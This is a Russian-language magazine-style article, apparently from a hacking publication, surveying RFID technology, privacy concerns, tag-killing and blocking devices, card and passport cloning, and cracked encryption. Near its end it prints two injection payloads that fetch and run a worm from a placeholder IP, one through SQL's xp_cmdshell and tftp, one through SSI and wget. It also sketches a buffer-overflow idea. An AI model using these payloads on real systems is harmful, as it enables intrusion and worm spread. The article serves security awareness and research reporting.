NFC Эксперт Rfid-хакинг – центр кт
Вступление
Ты, конечно, уже не раз слышал о такой новомодной технологии как RFID. Все чаще можно слышать в прессе и в Интернете упоминания о ней, споры, возникающие между сторонниками и противниками повсеместного распространения этой технологии, а так же
сводки на сайтах по информационной безопасности об угрозах, которые таит в себе слабая защищенность систем, использующих RFID. Эта статья расскажет тебе о новом направлении хакинга, только начинающем развиваться, об RFID-хаке.
Технология RFID
Начать повествование я решил с краткого описания технологии RFID. Вообще, RFID или Radio Frequency IDentification (радиочастотная идентификация) — это метод удаленного хранения и получения информации путем передачи радиосигналов с помощью
устройств называемых RFID-метками. История появления данной технологии восходит к первой половине XX столетия. Британские ВВС еще в начале Второй мировой использовали подобную технологию, устанавливая на самолеты устройства радиочастотной идентификации,
позволяющие эффективно отличать свои авиационные юниты от самолетов противника. Есть так же сведения, что в СССР в 50-х годах похожая технология использовалась для шпионажа. С 60-х годов начинаются исследования о возможности применения RFID в
гражданских целях, а первая радиометка, аналогичная применяемым сегодня, была создана в научной лаборатории Лос Аламос в 1973 году.
Принцип работы RFID-систем весьма прост. Данные системы включают в себя два основных компонента: считыватель (ридер) и идентификатор (метка, чип, тег). Ридер излучает электромагнитную энергию. Метка улавливает этот сигнал и передает ответный,
который уже принимается антенной ридера.
По своему типу системы RFID подразделяются на пассивные и интерактивные. В пассивной системе излучение считывателя постоянно во времени (т.е. не модулировано) и служит только источником питания для радиометки, которая собственного источника энергии
не имеет. Получив энергию от ридера, метка включается и передает сигнал, который принимается считывателем. Вышеописанным способом работает большинство систем управления доступом, где необходимо только получить серийный номер идентификатора.
Более продвинутые RFID-системы используют интерактивный режим работы. Ридер в таких системах излучает модулированные колебания, то есть формирует запрос. RFID-метка дешифрирует запрос, обрабатывает его, и, если это необходимо, формирует соответствующий
ответ. Подобные системы необходимы, например, для работы с товарами, маркированными радиометками. Дело в том, что если система пассивная, то при попадании одновременно нескольких меток под излучение ридера их сигналы накладываются друг на друга
и возникает коллизия. Интерактивные же системы снабжены механизмом антиколлизии. Интерактивные RFID-теги часто имеют встроенную батарею, заряда которой может хватить на несколько лет. Интерактивные метки с собственным источником питания называют
активными, а те, что без него полупассивными.
RFID-метки можно подразделить на несколько категорий. Во-первых, по используемому диапазону радиочастот на:
- – низкочастотные (125 или 134.2 КГц);
- – высокочастотные (13.56 МГц);
- – UHF, т.е. ультравысокочастотные (868-956 МГц);
- – микроволновые (2.45 ГГц).
Во-вторых, по размерам встроенной памяти, которая может быть от 4 байт до 4 Кб, кроме того метка может иметь память только для чтения или же с возможностью дозаписи и перезаписи информации. Существует несколько стандартов RFID-меток, сформировавшихся
на сегодняшний день. Важным свойством радиометки является и ее размер, который может составлять всего 0.4х0.4 мм для пассивных меток, в то время как активные метки имеют размер с монету.
Применение: за и против
Применяться RFID может в самых разных областях. Во-первых, СКУД, т.е. системы контроля и управлением доступом. Исторически это было первым применением технологии RFID. Сегодня доступ в офис или дом с помощью proximity-карты со встроенным радиочипом
уже вполне обычное дело. Большинство подобных систем используют пассивные метки и работают в низкочастотном диапазоне, хотя в последнее время все чаще встречаются интерактивные системы на частотах 13.56 МГц. Реально новое направление в этой области
– создание RFID-имплантантов для людей. Первый эксперимент такого рода был проведен еще в 1988, а сегодня компания Applied Digital Solution предлагает любому желающему имплантировать себе в руку свою разработку – VeriChip.
Клонер proximity-карт
Во-вторых, это контроль за перевозкой грузов и конкретных товаров, их складской учет. Представь только, как просто будет проходить ревизия на складах или в супермаркетах – достаточно пройтись с ридером вдоль полок с товарами и все автоматически
будет переучтено в БД товаров. Существует стандарт RFID называемый EPC (electronic product code), являющийся аналогом штрих-кодов. Специалисты считают, что в ближайшее десятилетие RFID-метка на каждом отдельном товаре станет таким же обычным
явлением как сегодня штрих-код.
Еще одна очень важная область применения RFID – это электронные документы. Государства многих стран, в том числе и России, планируют уже в самое ближайшее время начать встраивать RFID-метки в паспорта своих граждан.
При этом в память имплантированной в паспорт метки будут заноситься не только обычные данные владельца (ФИО, год рождения и т.д.), но и биометрические признаки, а также цветное фото.
Как это всегда бывает, у технологии, подобной RFID, появляется множество сторонников и противников. Несмотря на все удобства, привносимые применением RFID, у многих людей ее внедрение вызывает большие опасения. И не зря. Во-первых, радиометки
по сути своей являются радиомаяками – ведь именно в этом качестве их использовала советская разведка в 50-х. И незаконное слежение еще не единственное, что вызывает опасения, гораздо большие опасения вызывает безопасность самой технологии. Сам
Брюс Шнайер, на планы оснащения паспортов RFID-метками, заявил, что “это чистая угроза национальной безопасности”.
Процесс клонирования proximity-карты
Конечно, такую важную технологию как RFID не могли оставить без внимания хакеры и различные исследователи информационной безопасности. Первое, на чем хотелось бы заострить внимание, это проблема, связанная с вмешательством с личную жизнь человека,
которая возможно будет иметь место в самом обозримом будущем. Только представь, что государство или же крупные корпорации будут иметь под контролем тысячи считывателей радиометок, расположенных на входах в метро, в дверях супермаркета или просто
посреди улиц. Такие считыватели способны накапливать информацию о нашем перемещении, о том какие товары мы только что приобрели в магазине. Конечно, сегодня это звучит несколько бредово, но пройдет, возможно, менее десятка лет, и наступит время,
когда каждый из нас добровольно или же принудительно будет всегда носить с собой имплантированный под кожу идентификационный чип. Напоминает кино в жанре киберпанк? Как бы то ни было, все идет именно к этому.
RFID и хакеры
Австралийские исследователи компьютерной безопасности в апреле этого года опубликовали работу, в которой описывается возможность препятствованию считыванию информации RFID-ридером с метки. В их планах создание устройства, которое не позволит считывать
информацию с RFID-меток без ведома их владельца. Они использовали метод, напоминающие DoS-атаку – радиоэфир захламляется огромным множеством сигналов, имитирующих сигналы меток. RFID-ридеры первого поколения, т.е. пассивные не имеют возможности
считать данные с карты из-за вышеупомянутого явления – коллизии. Интересно, что более продвинутые интерактивные ридеры, как показали опыты, также напрочь уходят в даун.
Но с созданием первого анти-RFID гаджета австралийцев опередили голландцы. В начале апреля на околокомпьютерных сайтах запестрила новость о разработанном сотрудниками Свободного университета Амстердама устройства, которое препятствует чтению RFID-меток
и информирует владельца о подобных попытках. Данный девайс разрабатывался в рамках проекта RFID Guardian группой исследователей под руководством профессора Эндрю Таненбаума (Andrew Tanenbaum), который помимо этого занимается еще рядом проектов,
посвященных безопасности RFID-систем. Разработанное голландцами устройство представляет собой КПК с 550Mhz процессором и 64 Мб памяти, оборудованный RFID-ридером и необходимым ПО.
Эта забавная радиометка на самом деле карикатура от противников RFID
Настоящие хакеры смотрели на проблему несколько иначе. Двое немецких компьютерщиков MiniMe и Mahajivana, состоящие в рядах “Хаоса”, решили, что лучший способ обезопасить себя от угроз, которые может принести технология RFID, это простое
уничтожение RFID-меток. Наиболее действенным способом убийства радиометок, обнаруженным хакерами, оказался помещение их на короткое время в микроволновку. Но далеко не любой предмет со встроенным RFID-чипом засунешь в микроволновую печь, поэтому
был разработан девайс, названный RFID-Zapper. Создатели устройства решили, что стоимость его должна быть минимальна, поэтому использовали в качестве основы одноразовый фотоаппарат-мыльницу, который сможет раздобыть любой желающий. После некоторых
усовершенствований вспышка такого фотоаппарата научилась создавать сильное электромагнитное поле наповал убивающее пассивные радиометки. Правда, пока только 13,56-мегагерцовые, но создатели Zapper’а обещают дальнейшее развитие проекта. RFID-Zapper
вызвал большой интерес на состоявшемся некоторое время назад европейском 22-ом слете хакеров CCC, как у хакеров так и у прессы.
Клонирование
Кстати, эта самая пресса, сама того не подозревая, привлекает все больше хакеров к изучению RFID. Наибольшую шумиху среди техногиков, вызвала недавняя статья американской журналистки Эннели Ньюитц (Annalee Newitz) под названием “The RFID
Hacking Underground”, опубликованная в майском выпуске Wired. Впервые о RFID-хаке говорилось как о новом направлении хакерства. Одним из “героев” этой статьи стал 23-хлетний студент Джонатан Вестхьюз (Jonathan Westhues), возможно,
первый из хакеров, сконструировавший устройство, способное клонировать RFID-метки. Это устройство, прозванное им proxmark, впервые было собрано Джонатаном еще в 2003 году и умело клонировать мотороловский Flexpass, RFID-чип довольно часто используемый
в proximity-картах систем аутентификации. С помощью proxmark’а, который легко умещался в кармане, Вестхьюз мог, приблизившись на достаточно близкое к человеку расстояние, незаметно клонировать, имеющуюся у того proximity-карту. И получить, таким
образом, доступ туда, где его явно быть не должно.
На протяжении всего этого времени Джонатан совершенствовал proxmark, и устройство уже получило третье рождение в виде proxmark3. Теперь оно обрело множество новых функций и умеет работать уже с большинством 125KHz и некоторыми 13.56MHz RFID-метками.
Не так давно хакеру удалось клонировать даже VeriChip, который его производители преподносят как наиболее надежный способ уберечь данные, касающиеся, идентификации пользователя. На состоявшейся этим летом конференции HOPE (Hackers On Planet Earth)
Number Six, Вестхьюз продемонстрировал чего на самом деле стоит разрекламированный VeriChip. Не обошлось там и без участия Эннели, которая, вероятно, чтобы привлечь большее внимание к данному мероприятию, ассистировала Джонатану с имплантированным
в руку VeriChip’ом. Судя по тому, сколько сообщений об этом “взломе” появилось в инете, представление им удалось ;).
Конечно, клонировать интерактивную RFID-метку задача гораздо более сложная, поэтому, думаю, в скором времени системы идентификации с пассивными метками уйдут в прошлое. Преимущество интерактивных систем, помимо всего прочего, это возможность использования
шифрования для защиты информации. На самом деле такие системы уже давно не редкость, к примеру, автомобильные иммобилайзеры, набирающие все большую популярность, или, те карты, что используются в Московском метрополитене еще с 1998 года. Подобную
же систему использовала компания ExxonMobil с 1997 года.
Проблемы шифрования
ExxonMobil – крупнейшая нефтяная корпорация, владеющая сетью бензозаправочных станций в США. Она внедрила на своих заправочных станциях инновационную платежную систему SpeedPass: оплата осуществлялась с помощью брелока с RFID-чипом внутри,
на котором записаны данные о платежном счете его владельца в системе SpeedPass. Трое исследователей компьютерной безопасности Стив Боно (Steve Bono), Мэтью Грин (Matthew Green) и Адам Стаблфилд (Adam Stubblefield) конкретно взялись за изучение
этой системы. RFID-чипы, использовавшиеся в этой системе, представляли собой разработку Texas Instruments под названием Digital Signature Transponder (DST).
DST – это полупассивная радиометка с системой 40-битного шифрования. Хотя 40-битное шифрование сегодня достаточно легко вскрываются брутфорсом, сложность вскрытия ключа заключалась в том, что сам алгоритм шифрования взломщикам был неизвестен.
Но парням удалось восстановить его, используя различные криптоаналитические методы. Затем они собрали мощный кластер, который смог расшифровывать по 5 ключей менее чем за 2 часа. Позже было сконструировано устройство, эмулирующее работу DST,
которое было проверено в действии на одной из станций ExxonMobil. После того как представители ExxonMobil ознакомились с результатами этого исследования, то заявили в прессе, что исследование “лабораторное” и на практике все это не
реализуемо. Но компания все же решила перестраховаться и перейти на чипы с 128-битным шифрованием.
Посмотрим, как обстоит дело с криптозащитой в таком важном сегодня направлении как электронные документы. Нидерландские спецы по информационной безопасности из фирмы Riscure первыми взломали прототип электронного паспорта, который собираются вводить
в Евросоюзе. Удалось им это вследствие достаточно простого алгоритма, примененного для шифрования личных данных владельца. Такая информация, как день рождения владельца паспорта, серийный номер, срок окончания его действия, легко предсказуема,
и помогла “взломщикам” расшифровать остальное содержимое памяти радиометки.
Окончательно добил все представления о самой возможности безопасной RFID известнейший криптолог, профессор Института Вейсмана, Ади Шамир (Adi Shamir). Исследования Шамир проводил на RFID-метках стандарта EPC (один из наиболее перспективных стандартов
на сегодняшний день), работающих в UHF-диапазоне частот и использующих 8-ми и 32-битное шифрование данных. Для подбора ключа использовалась направленная антенна и цифровой осциллограф. Выяснилось, что при посылке чипу неверного бита ключа шифра,
энергопотребление RFID-чипа несколько возрастает, что может быть зафиксировано несложной аппаратурой. Таким образом, возможен взлом даже достаточно длинных ключей, причем в весьма короткое время. И это уже не проблема шифрования, а скорее проблема
недоработанности самой технологии RFID. Шамир представил также интересную идею о возможности создания девайса для расшифровки данных с UHF RFID-тегов из обычного мобильника путем замены его ПО. Ведь GSM-мобилы и UHF-радиомети могут работать в
одних и тех же частотах. Буду с нетерпением ждать, что получится из этой затеи =).
Подмена содержимого памяти RFID-меток
Не спасает шифрование паспортов и от их клонирования. На завершившейся недавно хакерской конференции Defcon, немецкий эксперт инфосека Лукас Грюнвальд (Lukas Grunwald) продемонстрировал, как содержимое электронного паспорта может быть легко перенесено
на любую другую радиометку. При этом Лукас использовал разработанную вместе с его коллегой Борисом Вольфом (Boris Wolf) еще пару лет назад прогу RFDump , которая умеет считывать, редактировать, записывать (если это возможно) данные RFID-меток.
Первой версией данной проги был простенький perl-скрипт, теперь же RFDump представляет собой удобную тулзу, распространяющуюся под лицензией GPL. Существуют пока только версии для пингвина. Для работы проги необходим RFID-ридер ACG Multi-Tag
Reader или ему подобный. Грюнвальд вносит в софтину время от времени кое-какие нововведения, например, сейчас она позволяет задействовать в метке счетчик считываний (функция cookie), планируется введение возможности снятия шифрования данных меток
с помощью брутфорса или атаки по словарю, а так же проверка на ключи, выставляемые “по умолчанию”.
Программа RFDump
После создания своей проги, Лукас и Борис занялись активным изучением возможности взлома различных RFID-систем. Первым делом они изучили RFID-систему местного университетского кафе, где данные о сумме на счете клиента хранились прямо на карточке.
Питание там стало для них бесплатным :). Дальше больше: они останавливались в гостиницах и отелях, в которых для входа в номер использовались proximity-карты. Интересный факт: ни одна RFID-система в отелях из изученных ими десяти не имела шифрования,
и Грюнвальд после изучения 2-3 карт мог создать мастер-карту открывающую любую дверь. Но и системы с шифрованием часто оказывалось обойти очень просто – либо ключ подбирался простым перебором, либо стоял выставленный производителем по умолчанию.
Уязвимыми оказались и системы супермаркетов, где начали применять RFID как альтернативу штрих-кодам. Хакеры получили возможность с помощью карманных компьютеров переобозначать метки на дорогостоящих товарах как на менее дорогих, “экономя”
таким образом свою наличность. Со слов Грюнвальда, 3/4 всех изученных им RFID-систем оказались так или иначе уязвимыми.
Атаки через RFID-метки
Но несанкционированное чтение и клонирование меток это еще не все возможные тонкие места RFID-систем. Редактирование содержимого RFID-метки может позволить злоумышленнику осуществить самые разнообразные атаки на компьютеры, работающие с RFID.
Уязвимыми местами RFID-систем могут стать базы данных, которые могут быть подвержены sql-инъекциям; web-интерфейсы – здесь возможны различные виды внедрения вредоносного кода; не исключена возможность атак типа buffer overflow.
Наиболее просто реализуема атака типа sql-injection. Допустим, приложение работающее с RFID записывает на метку какую-то информацию, например, если это коробка с товаром, об ее содержимом – “beer”. Вот пример атаки на win-систему, уязвимую
к sql-inj: хакер изменяет значение тега на “beer’; EXEC Master..xp_cmdshell cd WindowsTemp & tftp -i <здесь ip> GET worm.exe & worm.exe;” и загружает (конечно, если машина подключена к инету) таким образом червя
в систему с БД товаров при считывании информации с метки.
Аналогично происходят атаки на системы, имеющие интерфейс, основанный на веб-компонентах. К примеру, внедрение через метку кода “<!–#exec cmd=”wget http://ip/worm -O /tmp/worm; chmod x /tmp/worm; /tmp/worm “–>” в уязвимую
linux-систему с SSI повторяет вышеописанную атаку на винду. Как ты уже понял, эти атаки практически ничем не отличаются от аналогичных атак на сайты в инете.
Еще пример. Допустим, в RFID-системе используются только метки с объемом памяти 128 байт. Программист, писавший приложение, обрабатывающее содержимое тегов, поленился сделать проверку на длину этого самого содержимого. В итоге имеется возможность
для переполнения буфера – ведь хитрый хакер может подсунуть системе метку с большим количеством памяти, чем 128 байт, внедрив туда и шелл-код.
Вышеприведенные сценарии атак я позаимствовал на сайте www.rfidvirus.org. На этом сайте выкладываются результаты исследований уже упомянутой в статье группы ученых во главе с профессором Э.Таненбаумом. Главной целью их исследований было создание вируса,
распространяющегося через RFID. И им это удалось – первый концептуальный вирус, не получивший названия, был создан в лаборатории амстердамского университета. Вирус распространяется через RFID-метки и заражает БД систем, использующих
Статьи о RFID